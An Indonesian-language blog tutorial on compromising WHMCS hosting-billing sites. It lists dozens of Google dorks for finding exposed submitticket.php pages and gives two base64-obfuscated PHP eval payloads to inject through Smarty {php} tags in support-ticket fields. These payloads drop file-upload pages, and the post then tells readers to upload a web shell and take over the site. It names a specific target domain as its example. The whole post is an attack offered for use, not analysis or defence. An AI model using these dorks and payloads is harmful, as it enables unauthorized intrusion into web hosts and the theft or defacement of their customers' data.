WHMCS adalah suatu script yang sekarang paling dipakai oleh banyak kalangan webhoster karena dengan memanage yang mudah.
WHMCS juga adalah sebuah billing yang berfungsi untuk pembuatan account hosting,reseller,vps maupun dedicated.WHMCS bisa dikatakan billing paling bagus untuk saat ini dan bisa dikatakan billing nomor 1, WHMCS melebihi billing2 yang lain seperti ModernBill,AcountLab ++ dan lainnya.
fitur WHMCS juga boleh dikatakan hampir komplit untuk urusan memanaged hosting, anda akan di manjakan dengan BILLING WHMCS ini ..
Pertama Yg Kita Butuhkan Adalah Dork inilah dia
Dork
intext:Powered by WHMCompleteSolution inurl:submitticket.php
intext:Powered by WHMCompleteSolution inurl:clients/submitticket.php
intext:Powered by WHMCompleteSolution inurl:client/submitticket.php
intext:Powered by WHMCompleteSolution inurl:clientsarea/submitticket.php
intext:Powered by WHMCompleteSolution inurl:clientarea/submitticket.php
intext:Powered by WHMCompleteSolution inurl:crm/submitticket.php
intext:Powered by WHMCompleteSolution inurl:cp/submitticket.php
intext:Powered by WHMCompleteSolution inurl:manage/submitticket.php
intext:Powered by WHMCompleteSolution inurl:member/submitticket.php
intext:Powered by WHMCompleteSolution inurl:members/submitticket.php
intext:Powered by WHMCompleteSolution inurl:billing/submitticket.php
intext:Powered by WHMCompleteSolution inurl:billings/submitticket.php
intext:Powered by WHMCompleteSolution inurl:support/submitticket.php
intext:Powered by WHMCompleteSolution inurl:help/submitticket.php
intext:Powered by WHMCompleteSolution inurl:secure/submitticket.php
intext:Powered by WHMCompleteSolution inurl:store/submitticket.php
intext:Powered by WHMCompleteSolution inurl:whmcs/submitticket.php
intext:Powered by WHMCompleteSolution inurl:log/submitticket.php
intext:Powered by WHMCompleteSolution inurl:myaccount/submitticket.php
intext:Powered by WHMCompleteSolution inurl:orders/submitticket.php
intext:Powered by WHMCompleteSolution inurl:order/submitticket.php
intext:Powered by WHMCompleteSolution inurl:portal/submitticket.php
intext:Powered by WHMCompleteSolution inurl:mc/submitticket.php
intext:Powered by WHMCompleteSolution inurl:office/submitticket.php
intext:Powered by WHMCompleteSolution inurl:submitticket.php site:com
intext:Powered by WHMCompleteSolution inurl:submitticket.php site:org
intext:Powered by WHMCompleteSolution inurl:submitticket.php site:net
intext:Powered by WHMCompleteSolution inurl:submitticket.php site:info
intext:Powered by WHMCompleteSolution inurl:".*/*/submitticket.php"
intext:Powered by WHMCompleteSolution inurl:".*/submitticket.php"
copy salah satu dork diatas paste di google
setelah mendapatkan segera klik lalu pilih sales / billing disini target saya https://scr-technologies.com
setelah itu
isi semua data dengan expoit Nama , subject , isi . ( untuk yang email , ngasal aja hmm )
kamu bisa menggunakan exploit - expoit di bawah ini
/templates/jxh.php
exploit
{php}eval(base64_decode('JGNvZGUgPSBiYXNlNjRfZGVjb 2RlKCJQRDl3YUhBTkNtVmphRzhnSnp4bWIzSnRJR0ZqZEdsdmJ qMGlJaUJ0WlhSb2IyUTlJbkJ2YzNRaUlHVnVZM1I1Y0dVOUltM TFiSFJwY0dGeWRDOW1iM0p0TFdSaGRHRWlJRzVoYldVOUluVnd iRzloWkdWeUlpQnBaRDBpZFhCc2IyRmtaWElpUGljN0RRcGxZM mh2SUNjOGFXNXdkWFFnZEhsd1pUMGlabWxzWlNJZ2JtRnRaVDB pWm1sc1pTSWdjMmw2WlQwaU5UQWlQanhwYm5CMWRDQnVZVzFsU FNKZmRYQnNJaUIwZVhCbFBTSnpkV0p0YVhRaUlHbGtQU0pmZFh Cc0lpQjJZV3gxWlQwaVZYQnNiMkZrSWo0OEwyWnZjbTArSnpzT kNtbG1LQ0FrWDFCUFUxUmJKMTkxY0d3blhTQTlQU0FpVlhCc2I yRmtJaUFwSUhzTkNnbHBaaWhBWTI5d2VTZ2tYMFpKVEVWVFd5Z G1hV3hsSjExYkozUnRjRjl1WVcxbEoxMHNJQ1JmUmtsTVJWTmJ KMlpwYkdVblhWc25ibUZ0WlNkZEtTa2dleUJsWTJodklDYzhZa jVWY0d4dllXUWdVMVZMVTBWVElDRWhJVHd2WWo0OFluSStQR0p 5UGljN0lIME5DZ2xsYkhObElIc2daV05vYnlBblBHSStWWEJzY jJGa0lFZEJSMEZNSUNFaElUd3ZZajQ4WW5JK1BHSnlQaWM3SUg wTkNuME5DajgrIik7DQokZm8gPSBmb3BlbigidGVtcGxhdGVzL 2p4aC5waHAiLCJ3Iik7DQpmd3JpdGUoJGZvLCRjb2RlKTt=')) ;{/php})
atau bisa juga menggunakan exploit ke 2
/downloads/indexx.php
exploit
{php}eval(base64_decode('JGM9YmFzZTY0X2RlY29kZSgiUEQ5d2FIQU5DbWxtS0dsemMyVjBLQ1JmVUU5VFZGc25VM1ZpYldsMEoxMHBLWHNOQ2lBZ0lDQWtabWxzWldScGNpQTlJQ0lpT3lBTkNpQWdJQ0FrYldGNFptbHNaU0E5SUNjeU1EQXdNREF3SnpzTkNnMEtJQ0FnSUNSMWMyVnlabWxzWlY5dVlXMWxJRDBnSkY5R1NVeEZVMXNuYVcxaFoyVW5YVnNuYm1GdFpTZGRPdzBLSUNBZ0lDUjFjMlZ5Wm1sc1pWOTBiWEFnUFNBa1gwWkpURVZUV3lkcGJXRm5aU2RkV3lkMGJYQmZibUZ0WlNkZE93MEtJQ0FnSUdsbUlDaHBjM05sZENna1gwWkpURVZUV3lkcGJXRm5aU2RkV3lkdVlXMWxKMTBwS1NCN0RRb2dJQ0FnSUNBZ0lDUmhZbTlrSUQwZ0pHWnBiR1ZrYVhJdUpIVnpaWEptYVd4bFgyNWhiV1U3RFFvZ0lDQWdJQ0FnSUVCdGIzWmxYM1Z3Ykc5aFpHVmtYMlpwYkdVb0pIVnpaWEptYVd4bFgzUnRjQ3dnSkdGaWIyUXBPdzBLSUNBTkNtVmphRzhpUEdObGJuUmxjajQ4WWo1RWIyNWxJRDA5UGlBa2RYTmxjbVpwYkdWZmJtRnRaVHd2WWo0OEwyTmxiblJsY2o0aU93MEtmUTBLZlEwS1pXeHpaWHNOQ21WamFHOG5EUW84Wm05eWJTQnRaWFJvYjJROUlsQlBVMVFpSUdGamRHbHZiajBpSWlCbGJtTjBlWEJsUFNKdGRXeDBhWEJoY25RdlptOXliUzFrWVhSaElqNDhhVzV3ZFhRZ2RIbHdaVDBpWm1sc1pTSWdibUZ0WlQwaWFXMWhaMlVpUGp4cGJuQjFkQ0IwZVhCbFBTSlRkV0p0YVhRaUlHNWhiV1U5SWxOMVltMXBkQ0lnZG1Gc2RXVTlJbE4xWW0xcGRDSStQQzltYjNKdFBpYzdEUXA5RFFvL1BpQT0iKTsNCiRmaWNoaWVyID0gZm9wZW4oJ2Rvd25sb2Fkcy9pbmRleHgucGhwJywndycpOw0KZndyaXRlKCRmaWNoaWVyLCAkYyk7DQpmY2xvc2UoJGZpY2hpZXIpOw=='));exit;{/php}
tapi disini saya menggunakan expoit yang pertama
lalu klik sumbit / ok
mari kita cek berhasil apa kaga hmm
ganti url submitticket.php jadi /templates/jxh.php kalau expoit ke 2 /downloads/indexx.php
contoh
https://scr-technologies.com/clients/templates/jxh.php --> expoit 1
bagi yang menggunakan expoit ke 2
https://scr-technologies.com/clients/downloads/indexx.php --> exploit 2
ga mbar untuk exploit 1
gambar untuk expoit yang ke- 2
nah Sudah dsitu Tinggal Kita Upload Shell aja hore Atau Mau Upload apa aja Terserah ente seneng
kalau belum punya shell bisa download di Kumpulan shell
Kalau Sudah Kita Upload Disini Kita akan Melihat Shell Kita upload tadi
Contoh : https://scr-technologies.com/clients/templates/jxh.php <-- kita ganti yg jxh.php menjadi nama shell kita upload tadi semisal dhanush.php
sekarang tinggal terserah anda
sudah berhasil masuk shell silahkan di takeover tuch web
ok kak seneng Sekian trima bangga Bila ada Kata" kurang Faham Saya Rela Caci dan Makian nya sabar
Post a Comment